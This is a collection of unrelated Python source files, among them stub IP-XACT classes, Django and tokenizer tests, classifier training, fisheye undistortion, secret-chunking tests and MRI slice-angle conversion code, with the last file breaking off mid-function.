"""Represents an IP-XACT channel."""
def __init__(self):
pass
def ToXml(self, indent=0):
"""Converts the object's data into XML format."""
return ""
class RemapState:
"""Represents an IP-XACT remap state."""
def __init__(self):
pass
def ToXml(self, indent=0):
"""Converts the object's data into XML format."""
return ""
class AddressSpace:
"""Represents an IP-XACT address space."""
def __init__(self):
pass
def ToXml(self, indent=0):
"""Converts the object's data into XML format."""
return ""
class MemoryMap:
"""Represents an IP-XACT memory map."""
def __init__(self):
pass
def ToXml(self, indent=0):
"""Converts the object's data into XML format."""
return ""
class Model:
"""Represents an IP-XACT model."""
def __init__(self):
pass
def ToXml(self, indent=0):
"""Converts the object's data into XML format."""
return ""
class ComponentGenerator:
"""Represents an IP-XACT component generator."""
def __init__(self):
pass
def ToXml(self, indent=0):
"""Converts the object's data into XML format."""
return ""
class Choice:
"""Represents an IP-XACT choice."""
def __init__(self):
pass
def ToXml(self, indent=0):
"""Converts the object's data into XML format."""
return ""
class FileSet:
"""Represents an IP-XACT fileset."""
def __init__(self):
pass
def ToXml(self, indent=0):
"""Converts the object's data into XML format."""
return ""
class WhiteboxElement:
"""Represents an IP-XACT whitebos element."""
def __init__(self):
pass
def ToXml(self, indent=0):
"""Converts the object's data into XML format."""
return ""
class Cpu:
"""Represents an IP-XACT cpu."""
def __init__(self):
pass
def ToXml(self, indent=0):
"""Converts the object's data into XML format."""
return ""
class OtherClockDriver:
"""Represents an IP-XACT *other* clock driver."""
def __init__(self):
pass
def ToXml(self, indent=0):
"""Converts the object's data into XML format."""
return ""
class ResetType:
"""Represents an IP-XACT reset type."""
def __init__(self):
pass
def ToXml(self, indent=0):
"""Converts the object's data into XML format."""
return ""
class Parameter:
"""Represents an IP-XACT parameter."""
def __init__(self):
pass
def ToXml(self, indent=0):
"""Converts the object's data into XML format."""
return ""
class Assertion:
"""Represents an IP-XACT assertion."""
def __init__(self):
pass
def ToXml(self, indent=0):
"""Converts the object's data into XML format."""
return ""
|
from django.test import TestCase
# Create your tests here.
from django.contrib.auth.models import User
from .models import Profile
class ProfileTestClass(TestCase):
'''
test class for Profile model
'''
def setUp(self):
self.user = User.objects.create_user(username="testuser", password="secret")
self.profile_test = Profile(image='https://ucarecdn.com/620ac26e-19f7-4c0a-86d1-2b4e4b195fa8/-/crop/610x452/15,0/-/preview/',
bio="this is a test bio",
owner=self.user)
self.profile_test.save()
def test_instance_true(self):
self.profile_test.save()
self.assertTrue(isinstance(self.profile_test, Profile))
|
from sklearn import svm
import visualization
from sklearn.linear_model import LogisticRegression
import matplotlib.pyplot as plt
import seaborn as sns
from sklearn.model_selection import train_test_split
from sklearn.metrics import confusion_matrix, classification_report
import pickle
from sklearn.svm import SVC
from xgboost import XGBClassifier
from sklearn.model_selection import GridSearchCV
from sklearn.metrics import make_scorer, f1_score
import xgboost as xgb
# Shuffle and split the dataset into training and testing set.
X_all = visualization.X_all
y_all = visualization.y_all
X_train, X_test, y_train, y_test = train_test_split(X_all, y_all,
test_size = 0.3,
random_state = 2,
stratify = y_all)
# Fitting Logistic Regression to the Training set
regression = LogisticRegression(random_state = 0)
regression.fit(X_train, y_train)
# # Uncomment to show the confusion matrix of Logistic Regression
# Y_pred = regression.predict(X_test)
# cm_regression = confusion_matrix(y_test, Y_pred)
# print(classification_report(y_test, Y_pred))
# sns.heatmap(cm_regression, annot=True,fmt='d')
# plt.show(block=True)
#Fitting the SVM to the training set
svm_model = SVC(kernel = 'rbf',random_state = 0)
svm_model.fit(X_train, y_train)
# # Uncomment to show the confusion matrix of SVM
# Y_pred = svm_model.predict(X_test)
# cm_svm = confusion_matrix(y_test, Y_pred)
# sns.heatmap(cm_svm, annot=True, fmt='d')
# plt.show(block=True)
#Fitting XGBoost to the Training set
xgboostmodel = XGBClassifier(seed=82)
xgboostmodel.fit(X_train, y_train)
# # Uncomment to show the confusion matrix of XGBoost
# Y_pred = xgboostmodel.predict(X_test)
# cm_xgboost = confusion_matrix(y_test, Y_pred)
# sns.heatmap(cm_xgboost, annot=True,fmt='d')
# plt.show(block=True)
#Tuning of XGBoost
parameters = { 'learning_rate' : [0.1],
'n_estimators' : [40],
'max_depth': [3],
'min_child_weight': [3],
'gamma':[0.4],
'subsample' : [0.8],
'colsample_bytree' : [0.8],
'scale_pos_weight' : [1],
'reg_alpha':[1e-5]
}
def predict_labels(clf, features, target):
''' Makes predictions using a fit classifier based on F1 score. '''
y_pred = clf.predict(features)
return f1_score(target, y_pred, pos_label='H'), sum(target == y_pred) / float(len(y_pred))
# TODO: Initialize the classifier
clf = xgb.XGBClassifier(seed=2)
# TODO: Make an f1 scoring function using 'make_scorer'
f1_scorer = make_scorer(f1_score,pos_label='H')
# TODO: Perform grid search on the classifier using the f1_scorer as the scoring method
grid_obj = GridSearchCV(clf,
scoring=f1_scorer,
param_grid=parameters,
cv=5)
# TODO: Fit the grid search object to the training data and find the optimal parameters
grid_obj = grid_obj.fit(X_train,y_train)
# Get the estimator
clf = grid_obj.best_estimator_
print(clf)
# Report the final F1 score for training and testing after parameter tuning
f1, acc = predict_labels(clf, X_train, y_train)
print( "F1 score and accuracy score for training set: {:.4f} , {:.4f}.".format(f1 , acc))
f1, acc = predict_labels(clf, X_test, y_test)
print("F1 score and accuracy score for test set: {:.4f} , {:.4f}.".format(f1 , acc))
# Persist the trained models to disk with pickle
pickle.dump(regression, open('regression_model','wb'))
pickle.dump(svm_model, open('svm_model','wb'))
pickle.dump(xgboostmodel, open('xgboostmodel','wb'))
pickle.dump(clf, open('tunedmodel','wb'))
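# To reuse a saved model later (illustrative sketch, assuming the files above
# were written to the current working directory):
#   loaded = pickle.load(open('tunedmodel', 'rb'))
#   loaded.predict(X_test)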
|
import pandas as pd
import math
import numpy as np
import cv2
import argparse
from glob import glob
from itertools import chain
import os
CORRECTW = 1350
CORRECTH = 720
SIDE_DISTANCE = 8000
FRONT_DISTANCE = 6000
REAR_DISTANCE = 8000
W_OFFSET = 50
VEHICLE_L = 5023
VEHICLE_W = 1960
HALF_VEHICLE_L = VEHICLE_L / 2
HALF_VEHICLE_W = VEHICLE_W / 2
AVM_PIXEL_SIZE = 15 # 15mm
# -----------------------distortion table--------------
file_name = "4066_distortion.xls"
xl_file = pd.ExcelFile(file_name)
dfs = {
sheet_name: xl_file.parse(sheet_name)
for sheet_name in xl_file.sheet_names
}
# print(dfs)
distortion = dfs['distortion'].values
ref_table = distortion[:900, 1]
real_table = distortion[:900, 2]
dist_table = distortion[:900, 3] * 0.01
def binary_search(arr, l, r, x):
while l < r:
mid = (l + r) // 2
if x > arr[mid]:
l = mid + 1
else:
r = mid
return r
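# Note (added for clarity): binary_search() returns the lower-bound index, i.e.
# the first position in arr whose value is >= x, so find_real_r() below can
# interpolate between the entries at idx - 1 and idx.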
def find_real_r(ref_r):
idx = binary_search(ref_table, 0, len(ref_table) - 1, ref_r)
left_ref = ref_table[idx - 1]
right_ref = ref_table[idx]
ratio = (ref_r - left_ref) / (right_ref - left_ref)
left_dist = dist_table[idx - 1]
right_dist = dist_table[idx]
target_dist = (right_dist - left_dist) * ratio + left_dist
return ref_r * (1 + target_dist)
def fisheye_undistort_lut(img_size, new_pixel_size):
# "fish eye distortion"
f = 1.29
pixel_size = 0.0042
new_pixel_size = new_pixel_size
height_in, width_in = img_size
width_out = CORRECTW
height_out = CORRECTH
lut_out = np.zeros((height_out, width_out, 2), dtype=np.float32)
for i in range(width_out):
for j in range(height_out):
#offset to center
x = i - width_out / 2 + 0.5
y = j - height_out / 2 + 0.5
r = math.sqrt(x * x + y * y) # image height
ref_r = r * new_pixel_size
real_r = find_real_r(ref_r)
origin_r = real_r / pixel_size
# print(ref_r, real_r)
if ref_r < 0.00001:
k = 1
else:
k = origin_r / r
src_x = x * k
src_y = y * k
# theta = math.atan2(src_x * pixel_size, f)
# src_x = f * theta
# src_y = src_y * math.cos(theta)
src_x = src_x + width_in / 2
src_y = src_y + height_in / 2
if src_x >= 0 and src_x < width_in and src_y >= 0 and src_y < height_in:
lut_out[j, i] = (src_x, src_y)
return lut_out
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument("-i",
"--input_dir",
default="avm",
help="input images dir")
parser.add_argument("-o",
"--output_dir",
default=".",
help="output images dir")
args = parser.parse_args()
img_ends = [".bmp", ".jpg", ".png"]
imgs_list = list(
chain(*[glob(args.input_dir + "/*" + img_end)
for img_end in img_ends]))
for i, img_path in enumerate(imgs_list):
img = cv2.imread(img_path)
if i == 0:
f = 1.29
# new_pixel_size = 0.00975 # 9.75um
new_pixel_size = 0.0042 # 4.2um
height_in, width_in, _ = img.shape
lut_undist = fisheye_undistort_lut((height_in, width_in),
new_pixel_size)
undist_img = cv2.remap(img, lut_undist, None, cv2.INTER_LINEAR)
img_name = os.path.basename(img_path)
cv2.imwrite(args.output_dir + "/" + img_name, undist_img)
|
import pytest
LV_BASIC_TOKENIZATION_TESTS = [
(
"Nevienu nedrīkst spīdzināt vai cietsirdīgi vai pazemojoši ar viņu "
"apieties vai sodīt.",
[
"Nevienu",
"nedrīkst",
"spīdzināt",
"vai",
"cietsirdīgi",
"vai",
"pazemojoši",
"ar",
"viņu",
"apieties",
"vai",
"sodīt",
".",
],
),
]
@pytest.mark.parametrize("text,expected_tokens", LV_BASIC_TOKENIZATION_TESTS)
def test_lv_tokenizer_basic(lv_tokenizer, text, expected_tokens):
tokens = lv_tokenizer(text)
token_list = [token.text for token in tokens if not token.is_space]
assert expected_tokens == token_list
|
from .markov import MarkovImage
from .scanner import ImageScanner
from .traversal import Traversal, HLines, VLines, Spiral, Blocks, Hilbert
from .type import ImageType, RGB, Grayscale, Indexed
from ..scanner import Scanner
from ..parser import Parser, LevelParser
Scanner.add_class(ImageScanner)
Traversal.add_class(HLines, VLines, Spiral, Blocks, Hilbert)
ImageType.add_class(RGB, Grayscale, Indexed)
|
import os, sys, cdms2, vcs, vcs.testing.regression as regression
baselineName = sys.argv[1]
projection = sys.argv[2]
zoom = sys.argv[3]
f = cdms2.open(vcs.sample_data + "/clt.nc")
a = f("clt")
x = regression.init()
p = x.getprojection(projection)
b = x.createboxfill()
b.projection = p
if (zoom == 'none'):
x.plot(a(latitude=(90,-90)), b, bg=1)
elif (zoom == 'subset'):
x.plot(a(latitude=(-50,90), longitude=(30, -30)), b, bg=1)
else:
b.datawc_x1 = 30
b.datawc_x2 = -30
b.datawc_y1 = -50
b.datawc_y2 = 90
x.plot(a, b, bg=1)
fileName = os.path.basename(baselineName)
fileName = os.path.splitext(fileName)[0]
fileName += '.png'
regression.run(x, fileName)
|
from upside.enforcer import config
from upside.enforcer.upload.chunks import chunk_secret_value, adjust_chunk_size
from upside.enforcer.upload.util import add_existing_secrets_to_secret_store
from upside.enforcer.util.secret import Secret
def test_chunking():
chunks = chunk_secret_value('abcdef', 1)
assert len(chunks) == 6
assert chunks[0] == 'a'
assert chunks[1] == 'b'
assert chunks[2] == 'c'
assert chunks[3] == 'd'
assert chunks[4] == 'e'
assert chunks[5] == 'f'
def test_adjust_chunk_size_does_not_change():
store = {
'test_chunk_000': 'a',
'test_chunk_001': 'b',
'test_chunk_002': 'c',
'test_chunk_003': 'd',
'test_chunk_004': 'e',
'test_chunk_005': 'f'
}
original_chunks = chunk_secret_value('abcdef', 1)
updated_chunks = adjust_chunk_size(original_chunks, store)
for idx, chunk in enumerate(updated_chunks):
assert original_chunks[idx] == chunk
def test_adjust_chunk_size_reduction():
store = {
'test_chunk_000': 'a',
'test_chunk_001': 'b',
'test_chunk_002': 'c',
'test_chunk_003': config.CHUNK_TERMINATION_VALUE,
'test_chunk_004': config.CHUNK_TERMINATION_VALUE,
'test_chunk_005': config.CHUNK_TERMINATION_VALUE
}
original_chunks = chunk_secret_value('abc', 1)
updated_chunks = adjust_chunk_size(original_chunks, store)
for idx, chunk in enumerate(updated_chunks):
assert original_chunks[idx] == chunk
def test_adjust_chunk_size_increase():
store = {
'test_chunk_000': 'a',
'test_chunk_001': 'b',
'test_chunk_002': 'c',
'test_chunk_003': config.CHUNK_TERMINATION_VALUE,
'test_chunk_004': config.CHUNK_TERMINATION_VALUE,
'test_chunk_005': config.CHUNK_TERMINATION_VALUE
}
original_chunks = chunk_secret_value('abcdefg', 1)
updated_chunks = adjust_chunk_size(original_chunks, store)
assert len(updated_chunks) == 7
assert updated_chunks[0] == 'a'
assert updated_chunks[1] == 'b'
assert updated_chunks[2] == 'c'
assert updated_chunks[3] == 'd'
assert updated_chunks[4] == 'e'
assert updated_chunks[5] == 'f'
assert updated_chunks[6] == 'g'
def test_add_existing_chunks_to_secret_store():
store = {}
aws_chunked_secrets = []
secret = Secret(key='/parent/child', value='test')
chunks = chunk_secret_value('abcdef', 1)
for idx, chunk in enumerate(chunks):
aws_chunked_secrets.append({'Name': '/parent/child' + '_chunk_' + "{:03d}".format(idx), 'Value': chunk})
add_existing_secrets_to_secret_store({'Parameters': aws_chunked_secrets}, store, secret)
assert len(store) == 6
for idx, key_value in enumerate(store.items()):
assert key_value[0] == secret.name + '_chunk_' + "{:03d}".format(idx)
assert key_value[1] == chunks[idx]
def test_add_existing_chunks_to_secret_store_wrong_key():
store = {}
aws_chunked_secrets = []
secret = Secret(key='/parent/step_child', value='test')
chunks = chunk_secret_value('abcdef', 1)
for idx, chunk in enumerate(chunks):
aws_chunked_secrets.append({'Name': '/parent/child' + '_chunk_' + "{:03d}".format(idx), 'Value': chunk})
add_existing_secrets_to_secret_store({'Parameters': aws_chunked_secrets}, store, secret)
assert len(store) == 0
|
import os
import numpy as np
from linescanning import utils
import pandas as pd
def correct_angle(x, verbose=False, only_angles=True):
"""correct_angle
This function converts the angles obtained with normal2angle to angles that we can use on the scanner. The scanner doesn't like angles >45 degrees; if such angles are entered, it will flip all kinds of parameters such as slice orientation and foldover.
Parameters
----------
x: float, numpy.ndarray
generally this should be literally the output from normal2angle, a (3,) array containing the angles relative to each axis.
verbose: bool
print messages during the process (default = False)
only_angles: bool
if we are getting the angles for real, we need to decide what the angle with the z-axis means. We do this by returning an additional variable 'z_axis_represents_angle_around' so that we know in :func:`linescanning.utils.get_console_settings` where to place this angle. By default only the converted angles are returned. When doing the final conversion, the real one, set this to False so that the axis flag is returned as well (default = True).
Returns
----------
numpy.ndarray
scanner representation of the input angles
str
if <only_angles> is set to False, it additionally returns an "X" or "Y", which specifies around which axis (X or Y) the angle with the z-axis is to be used
"""
if isinstance(x, np.ndarray) or isinstance(x, list):
scanner_angles = np.zeros((3,))
# set boolean for flipping RL angle in case of sagittal slice
flip = False
# flag for true coronal slice (i.e., angle with Y is already set to zero in scanner.Scanner())
true_cor = False
true_sag = False
# the angle with the z-axis can be interpreted in terms of angle AROUND Y (AP) AND AROUND X (RL)
# If the slice is in the sweetspot of coronal slices, we can interpret the angle WITH the z-axis
# as angle AROUND the Y (AP) axis. Otherwise we need to interpret it as the angle AROUND the X
# axis (RL)
z_axis_represents_angle_around = "Y"
# for good coronal slices, there are basically for options:
# 1) Large X | Large Y > vector = center to top-left (use angle as is)
# 2) Small X | small Y > vector = center to bottom-right (use angle as is)
# 3) Small X | Large Y > vector = center to top-right (flip sign)
# 4) Large X | Small Y > vector = center to bottom-left (flip sign)
#-------------------------------------------------------------------------------------------------------------------------------
# deal with x-axis
if 0 <= x[0] <= 45: # here we can decide on case 2 and 3 (small X's)
# 1) angles living between 0 deg and 45 deg can freely do so, nothing to update > most likely coronal slice
scanner_angles[0] = x[0]
# case 3) Small X | Large Y >> flip angle
if x[1] >= 90:
# in this situation, we can have two lines, mirrored over the RL-axis. The only thing that separates them is the angle with
# the Y-axis. If this is a large angle, we should have a negative value for the X-angle. If this is a small angle, this means
# we should have a positive value for the X-angle
scanner_angles[0] = utils.reverse_sign(scanner_angles[0])
if verbose:
print(f" Case 3 holds: Small X ({round(x[0],2)}) | Large Y ({round(x[1],2)})")
else:
# case 2) Small X | small Y >> use angle as is
if verbose:
print(f" Case 2 holds: Small X ({round(x[0],2)}) | Small Y ({round(x[1],2)})")
else:
pass
elif 45 <= x[0] <= 90:
# 2) these angles are a bit tricky. This means we're outside of the range for coronal slices, so we insert
# the corrected value into the second position and set position 1 to 0
# theoretically we could have a bang on coronal slice. In that case the y-axis angle
# has been set to zero and the angle with the x-axis represents the angle around the AP
# axis.
if x[1] != 0:
scanner_angles[0] = 999 # code for sag slice
scanner_angles[1] = x[0]-90
if verbose:
print(" No coronal cases hold: we'll get a sagittal slice")
sag_slice = True
else:
# if the y-angle is already set to zero, it means we have a coronal slice. This means the only
# angle we need is this angle. The foldover is dealt with in utils.get_console_settings
scanner_angles[0] = x[0]
scanner_angles[1] = 998 # code for fully 90 deg slice
true_cor = True
if verbose:
print(" We're dealing with a purely coronal slice. Only X-angle is required")
elif 90 <= x[0] <= 180: # here we can decide on case 1 and 4 (large X's)
# 3) such angles would mean we have a vector pointing in the opposite direction of case 1). We simply subtract
# it from 180 degrees
scanner_angles[0] = 180-x[0]
# case 1) Large X | Large Y >> use angle as is
if x[1] >= 90:
if verbose:
print(f" Case 1 holds: Large X ({round(x[0],2)}) | Large Y ({round(x[1],2)})")
else:
pass
else:
# case 4) Large X | Small Y >> flip angle
scanner_angles[0] = utils.reverse_sign(scanner_angles[0])
if verbose:
print(f" Case 4 holds: Large X ({round(x[0],2)}) | Small Y ({round(x[1],2)})")
# in case we have a sagittal slice, the RL-angle decides the direction of the vector. A center-topright
# vector is created with a positive value. This is decided by the RL-angle: a large RL angle means we have a
# center-topleft vector, a small RL angle means we have a center-topright vector.
flip = True
# if the above resulted in a sagittal slice, we need to convert the angles relative to the AP-axis. We have the
# angle with the RL-axis, scanner_angles[0], and the angle with the AP-axis then is 90-angle_RL. Because of the
# way the scanner interprets this, a center-topleft vector is created with the -(90-angle_RL).
#
# First we check if we have a sagittal slice; if so, the XY-angles are already sorted
if scanner_angles[0] == 999:
z_axis_represents_angle_around = "X"
else:
if 45 <= scanner_angles[0] <= 90:
# Convert angle with x-axis to be compatible with sagittal slice
if x[1] != 0:
scanner_angles[1] = 90-scanner_angles[0]
scanner_angles[0] = 999 # code for sagittal
# overwrite the angle around the axis that is represented by the angle with the Z-axis
z_axis_represents_angle_around = "X"
# decide on the direction of the sagittal slice, center-topleft or center-topright depending on what the
# initial angle with the x-axis was. Big angle means center-topleft, small angle means center-topright
if flip == True:
if verbose:
print(f" X angle was large ({round(x[0],2)}), inverting {round(scanner_angles[1],2)}")
print(f" Z angle = angle around RL-axis")
scanner_angles[1] = utils.reverse_sign(scanner_angles[1])
else:
if verbose:
print(f" X angle was small ({round(x[0],2)}), using {round(scanner_angles[1],2)} as is")
else:
pass
else:
if verbose:
print(f" Z angle = angle around AP-axis")
else:
pass
#-------------------------------------------------------------------------------------------------------------------------------
# now, if we found a suitable angle for X, we can ignore Y because we only need one of the two to get our line
# we could've obtained the Y-angle above if the X-angle was in the 45-90 range. In that case the first two positions
# are already filled.
#
if x[0] == 0:
# set straight to true sagittal slice
scanner_angles[1] = x[1]
true_sag = True
scanner_angles[0] = 998 # code for full sagittal
# overwrite the angle around the axis that is represented by the angle with the Z-axis
z_axis_represents_angle_around = "X"
if verbose:
print(" We're dealing with a purely sagittal slice. Only Y-angle is required")
elif scanner_angles[0] <= 45:
scanner_angles[1] = 0
elif scanner_angles[0] == 999:
# we've already corrected this angle if we have a sagittal slice
pass
else:
# deal with y-axis; same rules as for the x-axis apply
# we did not manage to get a good angle for X, so we need to convert the angle of Y relative to the AP axis
if 0 <= x[1] <= 45:
# 1) angles living between 0 deg and 45 deg can freely do so, nothing to update > most likely coronal slice
scanner_angles[1] = x[1]
elif 45 <= x[1] <= 90:
# 2) these angles are a bit tricky.
scanner_angles[1] = 90-x[1]
elif 90 <= x[1] <= 180:
# 3) such angles would mean we have a vector pointing in the opposite direction of case 1). We simply subtract
# it from 180 degrees
scanner_angles[1] = 180-x[1]
#-------------------------------------------------------------------------------------------------------------------------------
# deal with z-axis > this is a special angle as it can reflect an angle around the Z-axis OR the Y-axis, depending on
# the slice orientation. If slice == coronal > z-axis = angle AROUND Y-axis. If slice == sagittal > z-axis is angle
# around X-axis. Previously we've also flattened this angle to the YZ-plane, so it's now a planar angle.
# The angle with the z-axis starts at 0, where it points in the superior direction [0,0,1]. It then starts to rotate
# down towards the inferior axis [0,0,-1]. The start = 0 deg, the y-axis is the 90 deg mark, and inferior axis = 180.
# The scanner interprets these angles from -45 (DOWN/UP lines) to 45 (UP/DOWN) degrees. Other angles will be wrapped.
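    # Worked example with made-up numbers (illustration only): x[2] = 120 deg falls in case 3) below,
    # giving 180-120 = 60 deg with flip=True; 60 deg is the angle proximal to the Z-axis, so it becomes
    # 90-60 = 30 deg, and the flip then inverts it to -30 deg for the console.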
if true_cor == False and true_sag == False:
# we need to do something with the z-axis
if -45 <= x[2] <= 45:
            # 1) angles living between -45 deg and 45 deg can freely do so, nothing to update > most likely coronal slice
scanner_angles[2] = x[2]
elif 45 <= x[2] <= 90:
            # 2) these angles are a bit tricky. Here it means that the foldover direction is changed too
scanner_angles[2] = x[2]-90
elif 90 <= x[2] <= 180:
# 3) such angles would mean we have a vector pointing in the opposite direction of case 1). We simply subtract
# it from 180 degrees
scanner_angles[2] = 180-x[2]
flip = True
# check if we should have the opposite angle of the one we got.
if 45 <= scanner_angles[2] <= 90:
            # this means we got the angle proximal to the vector and Z-axis. We need the opposite one
scanner_angles[2] = 90-scanner_angles[2]
if flip == True:
# depending on whether the initial angle was big, we need to invert the sign to be compatible
# with the scanner
scanner_angles[2] = utils.reverse_sign(scanner_angles[2])
else:
scanner_angles[2] = x[2]
# return the result
if only_angles == True:
return scanner_angles
else:
return scanner_angles, z_axis_represents_angle_around
def normal2angle(normal, unit="deg", system="RAS", return_axis=['x','y','z']):
"""normal2angle
Convert the normal vector to angles representing the angle with the x,y,z axis. This can be done by taking the arc cosine over the dot product of the normal vector and a vector representing the axis of interest. E.g., the vector for x would be [1,0,0], for y it would be [0,1,0], and for z it would be [0,0,1]. Using these vector representations of the axis we can calculate the angle between these vectors and the normal vector. This results in radians, so we convert it to degrees by multiplying it with 180/pi.
Parameters
----------
normal: numpy.ndarray, list
array or list-like representation of the normal vector as per output of pycortex or FreeSurfer (they will return the same normals)
unit: str
unit of angles: "deg"rees or "rad"ians (default = "deg")
system: str
coordinate system used as reference for calculating the angles. A right-handed system is default (RAS)
see: http://www.grahamwideman.com/gw/brain/orientation/orientterms.html. The scanner works in LPS, so we'd need to define the x/y-axis differently to get correct angles (default = "RAS").
return_axis: list
List of axes to return the angles for. For some functions we only need the first two axes, which we can retrieve by specifying 'return_axes=['x', 'y']' (default = ['x','y','z']).
Returns
----------
list
list-like representation of the angles with each axis, first being the x axis, second the y axis, and third the z-axis.
Notes
----------
    Convert angles to sensible plane: https://www.youtube.com/watch?v=vVPwQgoSG2g: angles obtained with this method are not coplanar; they don't live in the same space. So an idea would be to decompose the normal vector into its components so it lives in the XY-plane, and then calculate the angles.
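    Example
    ----------
    Minimal illustrative call (the exact values assume `utils.convert2unit` simply normalizes its input):
    >>> normal2angle([0, 0, 1])  # a normal pointing superior -> roughly [90, 90, 0] degrees in RAS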
"""
vector = np.zeros((3))
vector[:len(normal)] = normal
# convert to a unit vector in case we received an array with 2 values
vector = utils.convert2unit(vector)
# print(f"Vector = {vector}")
# Define empty 3x3 array to be filled with 1's or -1's depending on requested coordinate system
COORD_SYS = np.eye(3)
if system.upper() == "RAS":
np.fill_diagonal(COORD_SYS, [1,1,1])
elif system.upper() == "LPS":
np.fill_diagonal(COORD_SYS, [-1,-1,1])
else:
raise NotImplementedError(f"You requested a(n) {system.upper()} system, but I can only deal with 'LPS' or 'RAS' for now")
# this works if both vectors are normal vectors; otherwise this needs to be scaled by the dot-product of both vector
# magnitudes
angles = np.arccos(vector @ COORD_SYS)
# convert to degree or radian
if unit == "deg":
angles = angles*(180/np.pi)
# we don't always need all axes to be returned, but we do so by default.
# Specify some options below.
if return_axis == ['x','y','z']:
return angles
elif return_axis == ['x','y']:
return angles[:2]
elif return_axis == ['y','z']:
        return angles[1:]
elif return_axis == ['x']:
return angles[0]
elif return_axis == ['y']:
return angles[1]
elif return_axis == ['z']:
return angles[2]
else:
raise NotImplementedError(f"Requested angles were '{return_axis}', this has not yet been implemented")
def get_console_settings(angles, hemi, idx, z_axis_meaning="Y"):
"""get_console_settings
Function that outputs what is to be inserted in the MR console. This function is the biggest source of misery during my PhD so far. Needs thorough investigation. The idea is pretty simple: we have a set of angles obtained from normal2angle, we have converted them to angles that the scanner can understand (i.e., angles <45 degrees), and now we need to derive which ones to use in order to place the line along the normal vector.
Parameters
----------
angles: np.ndarray
        literally the output from correct_angle, a (3,) numpy array with the 'corrected' angles
hemi: str
should be "L" or "R", is mainly for info reason. It's stored in the dataframe so we can use it to index
idx: int
this should be the integer representing the selected vertex. This is also only stored in the dataframe. No operations are executed on it
    z_axis_meaning: str
this string specifies how to interpret the angle with the z-axis: as angle around the X (RL) or Y (AP) axis. This can be obtained by turning off <only_angles> in :func:`linescanning.utils.correct_angle`. By default it's set to 'Y', as that means we're dealing with a coronal slice; the most common one. Though we can also get sagittal slices, so make sure to do this dilligently.
    (note: the foldover direction of the OVS bands, generally "FH", is not an argument; it is derived inside this function and returned in the dataframe. It can also be obtained via `linescanning.utils.correct_angle(foldover=True)`)
Returns
----------
pd.DataFrame
a dataframe containing the information needed to place the line accordingly. It tells you the foldover direction, slice orientation, and angles
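    Example
    ----------
    Illustrative call only; the angles are assumed to come from :func:`linescanning.utils.correct_angle`:
    >>> get_console_settings(np.array([10.0, 0.0, 5.0]), "L", 1234, z_axis_meaning="Y")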
"""
# Get index of smallest angle
# min_angle = np.argmin(abs(angles))
print(f"Dealing with hemisphere: {hemi}")
foldover = "FH"
# print(min_angle)
angle_x,angle_y,angle_z = angles[0],angles[1],angles[2]
# also see comments in 'correct_angle' for an explanation of what is happening, but in short:
# - based on the angle between the normal vector and the x-axis [-1,0,0] we decided whether
# we have a coronal or sagittal slice. Is the angle between 0-45, then we have a coronal
# slice, if it's between 45-90 degrees, we have a sagittal slice and the first angle is
# set to zero
#
# - here we will first check if the first angle is zero. As said, if that's the case we have
# a sagittal slice.
#
# - because the scanner flips the use of (counter)clockwise-ness, we need to flip the angles
    # for the XY-angles. The Z-angles are interpreted correctly (negative = UP, positive =
# DOWN)
#
# Decide on the slice
if angle_x != 999:
# coronal slice
orientation = 'coronal'
angle_fh = angle_x
# check if we should do something with the foldover in a coronal slice. This happens when the angle with the
# z-axis is lower than -45 or larger than 45. We should then flip the angle and change the foldover.
if angle_fh <= -45:
print(f" Angle around Y-axis = {angle_fh}; adding 90 deg & setting orientation to sagittal")
angle_fh += 90
orientation = "sagittal"
elif angle_fh >= 45:
print(f" Angle around Y-axis = {angle_fh}; substracting 90 deg & setting orientation to sagittal")
angle_fh -= 90
orientation = "sagittal"
# if the angle with the z-axis was large, we need to invert the angle (means right-pointing vector)
if angle_z >= 90:
angle_fh = utils.reverse_sign(angle_fh)
else:
orientation = 'sagittal'
angle_fh = angle_y
# print(f"Angle FH = {round(angle_y,2)}")
# check if we should do something with the foldover in a sagittal slice. This happens when the angle with the
# z-axis is lower than -45 or larger than 45. We should then flip the angle and change the foldover.
if angle_fh <= -45:
print(f" Angle around X-axis = {round(angle_fh,2)}; adding 90 deg & setting foldover to AP")
angle_fh += 90
foldover = "AP"
elif angle_fh >= 45:
print(f" Angle around X-axis = {round(angle_fh,2)}; adding 90 deg & setting foldover to AP")
# angle_fh -= 90
foldover = "AP"
# if the angle with the z-axis was large, we need to invert the angle (means down-pointing vector)
if angle_z >= 90:
angle_fh = utils.reverse_sign(angle_fh)
# if we have a sagittal slice, the angle with the z-axis represents the angle around the x-axis
# if we have a coronal slice, the angle with the z-axis represents the angle around the y-axis
    # you can see how this makes sense by using your phone and placing it coronally, and sagittally,
# then rotate with the angle with the z-axis that invisibly points to your ceiling
#
# Sometimes we also give a big angle as z-axis to know what way the vector is pointing. In that
# case the angle is not actually used for the console.
if not 998 in angles:
if z_axis_meaning.upper() == "Y":
angle_ap = angle_z
angle_lr = 0
elif z_axis_meaning.upper() == "X":
angle_ap = 0
angle_lr = angle_z
else:
raise ValueError(f"Z-axis means an angle around the {z_axis_meaning.upper()} axis?? Needs to be 'X' or 'Y'")
else:
angle_lr = 0
angle_ap = 0
data = {"parameter": ["orientation", "foldover", "vertex", "LR_rot", "AP_rot", "FH_rot"],
"value": [orientation, foldover, idx, angle_lr, angle_ap, angle_fh]}
df = pd.DataFrame(data)
df['hemi'] = hemi
return df
def rotate_normal(norm, xfm, system="RAS"):
"""rotate_normal
    Applies the rotation part of an affine matrix to the normal vector.
Parameters
----------
norm: numpy.ndarray
(3,) or (4,) array; If (4,) array, the last value should be set to zero to avoid translations
xfm: numpy.ndarray, str
(4,4) affine numpy array or string pointing to the matrix-file, can also be 'identity', in which case np.eye(4) will be used. This is handy for planning the line in session 1/FreeSurfer space
system: str
use RAS (freesurfer) or LPS (ITK) coordinate system. This is important as we need to apply the matrix in the coordinate system that the vector is living in. e.g., RAS vector = RAS matrix (not ANTs' default), LPS vector = LPS matrix. If LPS, then :func:`linescanning.utils.get_matrixfromants` is used, otherwise the matrix is first converted to ras with `ConvertTransformFile` and then read in with `np.loadtxt`.
Example
----------
>>> rotate_normal(normal_vector, xfm, system="LPS")
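    A hypothetical second call using the 'identity' shortcut (the rotation part of np.eye(4) leaves the vector unchanged):
    >>> rotate_normal([0, 0, 1], "identity")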
Notes
----------
The results of LPS_vector @ LPS_matrix is the same as RAS_vector @ RAS_matrix
"""
import numpy as np
if isinstance(xfm, str):
if system.upper() == "RAS":
if xfm != "identity":
xfm_tmp = xfm.split('.')[0]+"_ras.txt"
os.system(f"ConvertTransformFile 3 {xfm} {xfm_tmp} --ras --hm")
